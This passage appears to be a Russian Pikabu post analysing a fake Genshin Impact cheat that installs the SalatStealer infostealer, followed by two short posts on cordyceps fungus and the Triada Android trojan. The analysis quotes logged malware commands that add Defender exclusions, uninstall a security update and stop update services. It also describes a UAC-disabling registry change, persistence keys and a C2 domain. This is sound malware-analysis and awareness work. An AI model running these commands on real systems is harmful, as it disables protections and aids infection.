  22. C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

  23. C:\WINDOWS\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

  24. wusa  /uninstall /kb:890830 /quiet /norestart

  25. C:\WINDOWS\system32\sc.exe stop UsoSvc

  26. C:\WINDOWS\system32\sc.exe stop WaaSMedicSvc

  27. C:\WINDOWS\system32\sc.exe stop bits

  28. C:\WINDOWS\system32\sc.exe stop dosvc

  29. C:\WINDOWS\system32\powercfg.exe /x -hibernate-timeout-dc 0

  30. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-ac 0

  31. C:\WINDOWS\system32\powercfg.exe /x -standby-timeout-dc 0

  32. C:\Windows\System32\dllhost.exe /Processid:{0995f9a4-ba6d-4140-a15e-2b171752e608}  (Application was injected by another process)

  33. "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" "function ............."

  34. C:\Windows\System32\dllhost.exe /Processid:{3a3997b4-63b2-4a14-adf7-fc6a4d4fb2c3}  (Application was injected by another process)

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост
Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

🟨 Общие элементы

Обе программы:

  • Активно используют PowerShell и reg add.

  • Модифицируют службы и параметры Defender.

  • Пытаются внедрить исключения в систему защиты.

  • Используют техники персистентности (запуск по расписанию, скрытые скрипты).

File3.exe:

Этот фaл  отличается от других  упакован модифицированным UPX. Эта программа уже написана на Go(go1.22.0)  но зато активно общается  с 188.114.96.3, 172.67.191.102:433 и с другими

Видимо это и есть сам вредонос для удалённого доступ к компьютеру жертвы.  Позже я расскажу что же это такое. Обезопасим себя на всякий случай. Вот готовый .bat-файл, который создаст правила в брандмауэре Windows для блокировки IP-адреса 172.211.123.249:

@Echo off

echo Блокировка IP-адреса 172.211.123.249 через брандмауэр Windows...

REM Блокировка входящего трафика

netsh advfirewall firewall add rule name="Block 172.211.123.249 In" dir=in action=block remoteip=172.211.123.249 enable=yes

REM Блокировка исходящего трафика

netsh advfirewall firewall add rule name="Block 172.211.123.249 Out" dir=out action=block remoteip=172.211.123.249 enable=yes

echo Готово.

Pause

а это и есть SalatStealer, знакомитесь:

  • SalatStealer — это тип вредоносного ПО, предназначенный для кражи данных с заражённых устройств.

  • Он разработан на языке Golang и может выполнять различные действия, включая создание скриншотов и эксфильтрацию файлов.

  • Использование SalatStealer может привести к серьёзным последствиям, таким как кража личной информации.

Исследуем ЛУЧШИЙ ЧИТ НА GENSHIN IMPACT 5.5 Читы, Игры, Онлайн-игры, Вирус, Взлом, Школьники, Компьютер, Безопасность, Троян, Исследования, Реверс-инжиниринг, Malware, Длиннопост

Дропает   себя в разные места, запускает сам себя:

Конектится к:

https://sa1at[.]ru/sa1at/

https://sa1at[.]ru/sa1at/jcl2eeqx

Сайт sa1at[.]ru был идентифицирован как вредоносный и используется в качестве центра управления (C2) для вредоносного ПО под названием Salat Stealer. По данным ThreatFox, этот домен классифицируется как связанный с ботнетом и имеет высокий уровень достоверности угрозы (100%) .

Рекомендую  добавить sa1at[.]ru в файл hosts для блокировки доступа:

echo 127.0.0.1 sa1at.ru >> %SystemRoot%\System32\drivers\etc\hosts

SalatStealer — это вредоносное программное обеспечение, классифицируемое как инфостилер, разработанное на языке Go. Оно предназначено для кражи конфиденциальных данных с заражённых систем.

🧬 Основные характеристики

  • Язык разработки: Go (Golang)

  • Методы упаковки: Использует UPX (Ultimate Packer for eXecutables) для упаковки исполняемых файлов, что затрудняет анализ и обнаружение.

  • Основные функции:

    • Сбор системной информации: данные о жёстком диске, разрешение экрана, активные процессы и окна.

    • Кража учётных данных из браузеров (Chrome, Firefox, Edge) и почтовых клиентов.

    • Доступ к криптовалютным кошелькам и кража приватных ключей.

    • Поиск незашифрованных паролей в текстовых файлах.

    • Эксплуатация микрофона и камеры для записи аудио и видео, а также возможность трансляции экрана в реальном времени

Salat Stealer — это скрытное вредоносное ПО, разработанное на языке программирования Go, предназначенное для проникновения в системы и извлечения конфиденциальных данных. После заражения устройства оно собирает обширную системную информацию, такую как сведения о жёстком диске, разрешение экрана, запущенные процессы и активные окна. Одной из его наиболее тревожных особенностей является его способность транслировать рабочий стол жертвы в режиме реального времени и захватывать аудио и видео с помощью микрофона и камеры устройства, что создаёт серьёзные проблемы с конфиденциальностью. Кроме того, Salat Stealer способен извлекать файлы из скомпрометированной машины. Его присутствие может привести к значительным рискам, включая кражу личных данных, финансовые потери и серьёзные нарушения конфиденциальности.

Возможности и функциональность

Кража данных и сбор учётных данных
• Собирает сохранённые учётные данные из веб-браузеров (например, Chrome, Firefox, Edge).
• Извлекает учётные данные для входа из локальных почтовых клиентов.
• Получает доступ к файлам криптовалютного кошелька для кражи закрытых ключей или средств.
• Ищет незащищённые учётные данные, хранящиеся в текстовых файлах.
• Извлекает файлы из скомпрометированной системы, что может привести к серьёзным нарушениям конфиденциальности, финансовым потерям и краже личных данных.

Мониторинг рабочего стола в реальном времени
• Обладает возможностями потоковой трансляции, что позволяет злоумышленникам отслеживать активность на рабочем столе жертвы в режиме реального времени.
• Может записывать аудио и видео через микрофон и камеру устройства, что создаёт серьёзные риски для конфиденциальности.

Методы сохранения и уклонения
• Записывает файлы в критические системные каталоги (Windows, System32, Drivers, Program Files)
• Изменяет реестр Windows (ключ Run), чтобы обеспечить автоматическое выполнение при запуске.
• Использует методы обхода контроля учетных записей (UAC) для повышения привилегий.
• Выполняет сброшенные полезные нагрузки для расширения цепочки атак.
• Использует упаковку UPX для сокрытия своего кода и обхода обнаружения на основе сигнатур.

Обзор цепочки атак

  1. Первичное заражение:

    • Распространяется через фишинговые письма, вредоносные вложения и скрытые загрузки.

    • Также может распространяться через взломанное программное обеспечение или троянизированные приложения.

  2. Исполнение и настойчивость:

    • Вредоносная программа запускается при взаимодействии с пользователем, например, при открытии вредоносного файла.

    • Для достижения устойчивости он использует реестр Windows (ключ «Выполнить»).

    • Попытки обойти контроль учетных записей (UAC) для получения повышенных привилегий.

  3. Системная разведка и сбор данных:

    • Перечисляет запущенные процессы и активные окна.

    • Сканирует сохраненные учетные данные в веб-браузерах, почтовых клиентах и криптовалютных кошельках.

    • Проверяет языковые настройки системы, чтобы потенциально избежать заражения определенных регионов.

  4. Утечка данных:

    • Извлеченные учетные данные и сведения о системе отправляются на контролируемый злоумышленником сервер управления и контроля (C2).

    • Вредоносная программа может попытаться удалить следы своей активности, чтобы избежать обнаружения.

Обход контроля учетных записей пользователей (UAC)

SalatStealer использует обходные методы контроля учетных записей (UAC) для получения повышенных привилегий без оповещения пользователя. Устанавливая ключ EnableLUA в \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA на «0» (отключает UAC).

При установке EnableLUA на 0 вредоносная программа отключает принудительное применение UAC, что позволяет ей выполнять административные команды и сохранять устойчивость, обходя ограничения безопасности. Однако это изменение вступает в силу не сразу — для полного отключения UAC требуется перезагрузка системы. Пока система не перезагрузится, запрос UAC будет по-прежнему отображаться при запуске вредоносной программы.

Механизм устойчивости SalatStealer

SalatStealer обеспечивает постоянство, копируя себя в случайные каталоги. В моем случае он скопировал себя в:

  • C:\Program Files (x86)\Защитник Windows\

  • C:\Program Files (x86)\Windows NT\

Затем он создает ключи запуска в реестре Windows, чтобы обеспечить выполнение при запуске:

\REGISTRY\USER\<USER_SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = «C:\\Program Files (x86)\\Windows Defender\\smss.exe»

\REGISTRY\USER\<USER_SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = «C:\\Program Files (x86)\\Windows NT\\dllhost.exe»

Мониторинг экрана и рабочего стола в реальном времени

Salat Stealer может непрерывно делать снимки экрана и даже транслировать содержимое рабочего стола жертвы на командный сервер (C2) злоумышленника, обеспечивая наблюдение за его действиями в режиме реального времени.

Кража данных буфера обмена

Salat активно отслеживает активность буфера обмена, что позволяет ему перехватывать скопированный текст, включая пароли, адреса криптовалют и другие конфиденциальные данные.

Кейлоггерство – перехват нажатия клавиш

Salat Stealer записывает все, что вводится в систему жертвы, фиксируя учетные данные, сообщения и любые другие вводимые данные в режиме реального времени.

Аудио- и видеошпионаж

Salat Stealer функционирует как полноценный шпионский инструмент, способный:

Запись микрофона: захват и передача звука с микрофона жертвы.
Доступ к веб-камере: запись видео с веб-камеры системы.
Прямая трансляция: трансляция аудио- и видеопотоков в реальном времени на удалённый сервер злоумышленника.

Эксфильтрация

Salat Stealer использует скрытый процесс эксфильтрации для передачи украденных данных на свой сервер C2, используя шифрование AES для сокрытия конфиденциальной информации перед передачей. Файлы упакованы в архивы ZIP

Заключение

SalatStealer — это скрытное и устойчивое вредоносное ПО, предназначенное для кражи конфиденциальных данных, избегая обнаружения. Собирая учетные данные, изымая файлы и обеспечивая наблюдение в реальном времени, оно представляет серьезные риски для жертв, включая финансовые потери, кражу личных данных и нарушения конфиденциальности. Оно использует обход UAC и изменения реестра, что затрудняет удаление. Кроме того, его механизмы шифрования и упаковка UPX еще больше усложняют анализ и обнаружение. Учитывая его широкую направленность на веб-браузеры, криптовалютные кошельки и приложения для обмена сообщениями, SalatStealer остаётся значительной угрозой, подчёркивая необходимость постоянного мониторинга и расширенных мер безопасности для противодействия его воздействию.

Показать полностью 22
[моё] Читы Игры Онлайн-игры Вирус Взлом Школьники Компьютер Безопасность Троян Исследования Реверс-инжиниринг Malware Длиннопост
5
6
SSmehIGreh
SSmehIGreh
2 месяца назад

Вы Знали Что⁠⁠

Вы Знали Что Факты, Грибы, Муравьи, Зомби, Вирус, The Last of Us

Вы знали что гриб Кордицепс однобокий превращает муравьёв в «зомби», полностью подчиняя их поведение перед смертью!

- Как это работает? Споры гриба попадают в тело муравья, прорастают внутрь и меняют его мозг.
- Зомби-режим: Заражённый муравей покидает колонию, забирается на высоту 20–30 см (часто на северную сторону растения), вцепляется челюстями в лист или ветку и замирает.
- Финал: Гриб убивает муравья, прорастает через его голову и рассеивает споры, чтобы захватить новых жертв.

💀 Этот механизм вдохновил сюжет игры The Last of Us!

Этот и другие интересные факты вы можете найти здесь
https://t.me/ViZnaliCto/21

Показать полностью
[моё] Факты Грибы Муравьи Зомби Вирус The Last of Us
16
0
Entuzias10
Entuzias10
2 месяца назад

Осторожно: смартфоны с предустановленным трояном Triada угрожают вашей безопасности⁠⁠

Эксперты в области кибербезопасности вновь предупреждают о распространении опасного трояна Triada, который обнаружен на некоторых моделях Android-смартфонов, поступающих в продажу уже зараженными. Этот вредоносный софт обладает широкими возможностями и может серьезно угрожать конфиденциальности и безопасности пользователей.

Осторожно: смартфоны с предустановленным трояном Triada угрожают вашей безопасности Новости, Вирус, Android, Мошенничество, Информационная безопасность, Интернет-мошенники, Стартап, Длиннопост

Что такое Triada и чем он опасен?

Triada — это модульный мобильный троян, впервые выявленный в 2016 году. Он отличается высокой степенью сложности и способен:

  • Получать root-доступ, что позволяет ему вносить изменения в системные файлы и процессы устройства.

  • Интегрироваться в процесс Zygote, являющийся основой для запуска всех приложений на Android, что обеспечивает его присутствие во всех запущенных приложениях.

  • Скрывать свое присутствие, делая его обнаружение и удаление крайне затруднительным.

Основная цель Triada — перехват финансовых транзакций, отправляемых через SMS, и перенаправление средств на счета злоумышленников. Кроме того, троян способен загружать и запускать дополнительные вредоносные модули, расширяя спектр своих функций.

«Троянец Triada известен давно, он все еще остается одним из наиболее сложных и опасных среди угроз для Android. Его новая версия проникает в прошивки смартфонов еще до того, как гаджеты попадают в руки пользователей. Вероятно, на одном из этапов цепочка поставок оказывается скомпрометированной, поэтому в магазинах могут даже не подозревать, что продают смартфоны с Triada. При этом авторы новой версии Triada активно монетизируют свои усилия. Судя по анализу транзакций, они смогли перевести порядка 270 000 долларов в разной криптовалюте на свои криптокошельки. Однако в реальности эта сумма может быть больше, злоумышленники также были нацелены на Monero — криптовалюту, которую невозможно отследить», — комментирует Дмитрий Калинин, эксперт по кибербезопасности в «Лаборатории Касперского».

Какие устройства подвержены риску?

Согласно исследованиям, Triada был обнаружен на ряде бюджетных моделей Android-смартфонов, включая:

  • Leagoo M5

  • Leagoo M5 Plus

  • Leagoo M5 Edge

  • Leagoo M8

  • Leagoo M8 Pro

  • Leaoo Z5C

  • Leagoo T1 Plus

  • Leagoo Z3C

  • Leagoo Z1C

  • Leagoo M9

  • ARK Benefit M8

  • Zopo Speed 7 Plus

  • UHANS A101

  • Doogee X5 Max

  • Doogee X5 Max Pro

  • Doogee Shoot 1

  • Doogee Shoot 2

  • Tecno W2

  • Homtom HT16

  • Umi London

  • Kiano Elegance 5.1

  • iLife Fivo Lite

  • Mito A39

  • Vertex Impress InTouch 4G

  • Vertex Impress Genius

  • myPhone Hammer Energy

  • Advan S5E NXT

  • Advan S4Z

  • Advan i5E

  • STF AERIAL PLUS

  • STF JOY PRO

  • Tesla SP6.2

  • Cubot Rainbow

  • EXTREME 7

  • Haier T51

  • Cherry Mobile Flare S5

  • Cherry Mobile Flare J2S

  • Cherry Mobile Flare P1

  • NOA H6

  • Pelitt T1 ПЛЮС

  • Prestigio Grace M5 LTE

  • BQ 5510

Эти устройства поступают в продажу с предустановленным трояном, что указывает на компрометацию цепочки поставок.

Осторожно: смартфоны с предустановленным трояном Triada угрожают вашей безопасности Новости, Вирус, Android, Мошенничество, Информационная безопасность, Интернет-мошенники, Стартап, Длиннопост

Рейтинг стран, подвергшиеся атаке

Как защитить себя?

Чтобы минимизировать риск заражения:

  1. Покупайте устройства у проверенных продавцов. Избегайте приобретения смартфонов в сомнительных онлайн-магазинах или у неофициальных дилеров.

  2. Используйте надежное антивирусное ПО. Установите проверенные решения для защиты от вредоносного софта и регулярно обновляйте их.

  3. Будьте внимательны к разрешениям приложений. Перед установкой приложений проверяйте, какие разрешения они запрашивают, и избегайте предоставления излишних прав.

  4. Обновляйте операционную систему. Регулярно устанавливайте обновления ОС и приложений для защиты от известных уязвимостей.

Помните, что предустановленный вредоносный софт особенно опасен, так как может действовать скрытно и с повышенными привилегиями.

Источники: rbc.ru, securityweek.com, 2-spyware.com, threats.kaspersky.com

Показать полностью 2
[моё] Новости Вирус Android Мошенничество Информационная безопасность Интернет-мошенники Стартап Длиннопост
4
Посты не найдены
О Нас
О Пикабу
Контакты
Реклама
Сообщить об ошибке
Сообщить о нарушении законодательства
Отзывы и предложения
Новости Пикабу
RSS
Информация
Помощь
Кодекс Пикабу
Награды
Команда Пикабу
Бан-лист
Конфиденциальность
Правила соцсети
О рекомендациях
Наши проекты
Блоги
Работа
Промокоды
Игры
Скидки
Курсы
Зал славы
Mobile
Мобильное приложение
Партнёры
Промокоды Biggeek
Промокоды Маркет Деливери
Промокоды Яндекс Путешествия
Промокоды М.Видео
Промокоды в Ленте Онлайн
Промокоды Тефаль
Промокоды Сбермаркет
Промокоды Спортмастер
Постила
Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии